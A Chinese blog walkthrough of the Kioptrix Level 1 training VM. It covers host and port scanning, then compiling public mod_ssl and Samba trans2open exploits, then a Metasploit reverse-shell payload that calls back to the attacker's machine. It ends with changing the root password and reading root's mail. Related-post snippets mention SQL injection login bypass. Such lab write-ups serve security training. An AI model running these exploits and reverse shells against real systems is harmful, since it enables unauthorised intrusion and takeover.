Kioptrix-1

最新推荐文章于 2024-07-31 08:54:03 发布
最新推荐文章于 2024-07-31 08:54:03 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: OSCP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LZHPIG/article/details/104880779
版权

夫君子之行,静以修身,俭以养德,非淡泊无以明志,非宁静无以致远

00 环境准备

Kali(IP:10.10.16.128)
Kioptrix 靶机
NAT 网络连接

01 主机发现

nmap -sP 10.10.16.0/24

在这里插入图片描述

02 端口扫描

nmap -A -v -sS -sP -p- -T4 10.10.16.152

得到开放的端口:22,80,111,139,443,1024,并得到在对应端口下使用的软件(mod_ssl/samba)。
通过端口扫描得知 apache-1.3.20,openssl-0.9.6b,mod_ssl-2.8.4(老版,谷歌搜索漏洞)
对于端口使用的插件,在下面将专门对其进行漏洞挖掘
在这里插入图片描述

03 目录扫描

dirb http://10.10.16.152

对 dirb 爬行的目录进行访问,没有发现可利用的价值。
在这里插入图片描述

04 漏洞挖掘

nikto -h 10.10.16.152

使用 nikto 进行 web 扫描发现几处可利用漏洞。
在这里插入图片描述
可以使用在线漏洞数据库搜索相对应的版本漏洞

https://www.exploit-db.com/search

在这里插入图片描述

05 漏洞利用

0x01 mod_ssl ( remote buffer overflow )

使用 Kali 自带的漏洞查找工具查找本地所有漏洞和 shellcode

searchsploit mod_ssl

ps: 如果使用 764.c 脚本的话,应为该脚本版本太老,所以还需对其内容进行修改,有点麻烦,这里直接使用 47080.c 脚本。
764.c 修改

在桌面新建一个 Kioptrix 文件夹,将 47080.c 文件拷贝过去,查看文件头得知文件的使用方法:要先安装 libssl-dev 库才能编译文件。

cp /usr/share/exploitdb/exploits/unix/remote/47080.c .
head 47080.c
sudo apt-get install libssl-dev
gcc -o OpenFuck 47080.c -lcrypto

在这里插入图片描述
编译之后运行生成的二进制文件,发现使用该二进制文件的方法。
在这里插入图片描述
由于该靶机使用 apache-1.3.20,所以将 target 定位到 0x6a - 0x6b
在这里插入图片描述在这里插入图片描述

0x02 samba 2.2

① remote code excution

利用 msf 的 auxiliary/scanner/smb/smb_version 模块得知靶机使用 samba-2.2.1a

搜索 samba 2.2 的漏洞利用模块,发现最下方的 Remote Code Excution
在这里插入图片描述
将该模块下的脚本复制到自定义的文件夹里面,查看文件头,编译脚本。

cp /usr/share/exploitdb/exploits/multiple/remote/10.c .
head 10.c
gcc -o samba 10.c

在这里插入图片描述

./samba -b 0 10.10.16.152  # -b 0 是指 Linux

在这里插入图片描述

② Remote Buffer Overflow

在这里插入图片描述

gcc -o call_trans2open 22469.c

在这里插入图片描述

./call_trans2open -t 10.10.16.152

在这里插入图片描述

③ 利用 msf

从上面 searchsploit 的结果来看,还有几个模块是关于 metasploit 的,因此可以利用 msf 来getshell 提权。

msfconsole
use exploit/linux/samba/trans2open

在这里插入图片描述
使用 show options 查看要添加什么参数
在这里插入图片描述
使用该模块下的一个 payload

set payload linux/x86/shell_reverse_tcp

在这里插入图片描述

set rhosts 10.10.16.152
set lhost 10.10.16.128
exploit

在这里插入图片描述
ps: 使用 python -v 查看当前 python 版本是 python 1.5 ,所以不能使用 python -c ‘import pty;pty.spawn("/bin/bash");’ ,可以使用 passwd 可以改变 root 密码,然后通过 ssh 登录 root 账户获取完全交互式 shell。
在这里插入图片描述

0x03 capture the flag

cat /var/mail/root

在这里插入图片描述

                                                                                                                                                                    猪头
                                                                                                                                                                 2020.3.15
z_hunter
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub系列-Kioptrix-Level-2
Yasso的博客
12-18 576
靶机: 192.168.249.130 kali: 192.168.249.129 一、信息收集 arp-scan -l nmap -sV 192.168.249.130—查看开放端口 ----访问下80端口---- 发现是个登录框先试试万能密码 username:admin' or 1=1# password:123(任意密码) 发现可以登陆,即存在sql注入 二、0x00漏洞利用(sql注入) sqlmap跑一下数据 登陆框抓包,因为sql注入在username处,在username处标记(减少测试时
Vulnhub系列-Kioptrix-Level-4
Yasso的博客
12-20 1857
靶机:192.168.249.133 kali:192.168.249.132 一、信息收集 nmap -sV 192.168.249.133 —查看开放端口 —查看下80端口— —是个登录框可能猜测sql注入漏洞— —在用户名和密码处*标记,sqlmap跑一下 sqlmap -r 1.txt --level 3 -risk 2 --batch -D members -T members -C password,username --dump—爆出用户名john密码MyNameIsJohn ssh
kioptrix-level-1
热门推荐
cxyzupup的博客
01-10 1万+
kioptrix-level-1-1,22 项目地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22 提示:靶机网络连接方式使用NAT模式。 文章目录kioptrix-level-1-1,22一、信息收集1. 使用fping工具查找靶机IP:2. 使用nmap对目标主机端口进行枚举:二、信息利用1. 查看80端口:2. 查看443端口:总结 一、信息收集 1. 使用fping工具查找靶机IP: 命令如下: kali@kali:~/Desktop$ fp
2024年网络安全最新Kioptrix level-4 多种姿势 渗透 详解_liggoat secure,不同层级的网络安全开发者的不同行为
2401_84296945的博客
05-07 965
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
vulnhub靶场 Kioptrix-level-1
qq_69775412的博客
10-08 550
简介: vulnhub是一个提供靶场环境的平台。而Kioptrix-level-1就是一个对新手比较友好的靶场。初学渗透的同学可以做做试试看,项目地址如下。
Vulnhub靶机:Kioptrix_Level1
qq_48904485的博客
03-12 911
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix_Level1(192.168.56.105)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
kioptrix-level2 渗透测试
viki101的博客
09-20 515
3306 (3306/tcp open mysql MySQL (unauthorized))端口,可以利用。开启了80(80/tcp open http Apache httpd 2.0.52 ((CentOS))),一个登录框,看见登录框,就想到了弱口令和sql注入,首先用sql注入万能密码来一波。首先它是一个web控制台,可以ping计算机网络,这就想到了远程命令执行漏洞。根据nmap扫描结果显示,可以发现CentOS,其权限为apache,之后尝试反弹shell。
Vulnhub系列-Kioptrix-Level-3
Yasso的博客
12-19 1306
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Kioptrix-1.2打靶渗透
weixin_52487093的博客
07-31 304
【代码】Kioptrix-1.2打靶渗透。
Vulnhub系列-Kioptrix-Level-5
Yasso的博客
12-22 320
靶机:192.168.249.134 kali: 192.168.249.132 一、信息收集 ufs:/dev/ada0p2 —指定根分区启动系统 这样指定根分区启动成功 –靶机变为login才算打开— nmap -sV 192.168.249.134 —查看开放端口 —访问下80端口— <查看源代码> <看到URL访问下> —搜下有无pChart 2.1.3的漏洞— <貌似是个目录遍历漏洞和xss,看下exp怎么利用> 先玩玩XSS,刚开始以为是反射型 测试
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Kioptrix2-WalkThrough 靶机复现.docx
10-18
1. 信息收集:使用 nmap 工具对靶机进行 IP 探活和端口扫描。 2. SQL 注入:使用万能密码尝试登录到靶机上。 3. 命令执行:使用;pwd 命令来确定当前目录,并执行系统命令。 4. 反弹 shell:使用 nc 命令将 shell ...
vuInhub靶场实战系列-Kioptrix Level #1
06-08
vuInhub靶场实战系列-Kioptrix Level #1
vuInhub靶场实战系列-Kioptrix Level #4
06-12
vuInhub靶场实战系列-Kioptrix Level #4
vuInhub靶场实战系列-Kioptrix Level #3
06-10
vuInhub靶场实战系列-Kioptrix Level #3
【中科院1区】Matlab实现天鹰优化算法AO-RF锂电池健康状态估计算法研究.rar
最新发布
08-02
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
汽车行业数字化转型报告顶层规划设计.docx
08-02
汽车行业数字化转型报告顶层规划设计.docx
毕业设计,基于ASP.NET+SqlServer开发的企业投资价值分析系统,内含完整源代码,数据库,毕业论文
08-02
毕业设计,基于ASP.NET+SqlServer开发的企业投资价值分析系统,内含完整源代码,数据库,毕业论文 自中国证券市场产生以来,投资者进行投资理财迫切需要有一个科学的理论依据,在众多投资理论体系中,确定企业的价值和股票的价值,是一个重要的流派。著名的投资专家巴非特就是通过分析企业的内在价值,寻找价值被低估的股票,等到市场认可了该企业的价值,再将股票抛出,从而获得了的投机收益,其管理的基金也一度成为世界上最成功的投资基金之一。从西方国家理论界对相关领域的研究结果来看,也取得了一些成果,包括:CAPM 模型、 ICAPM模型、APT模型等,也有人用市盈率方法对股票进行定价。国内在相关的领域也取得了一些研究成果。然而,尽管国内外理论界研究成果较多,但真正适应中国证券市场、适应中国广大投资者的切实有效的理论至今仍是一个空白。在中国这样一个特殊的背景下,股权结构的特殊性、证券市场初创时期的投资性等因素,使得一些模型受到挑战,而且这些模型的精确化程度也受到限制,有必要探求新的思路和方法,为广大的投资者提供切实可靠的操作依据。对股票的价值进行评估必须综合尽可能全面的因素才能使得这些评估更加科
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值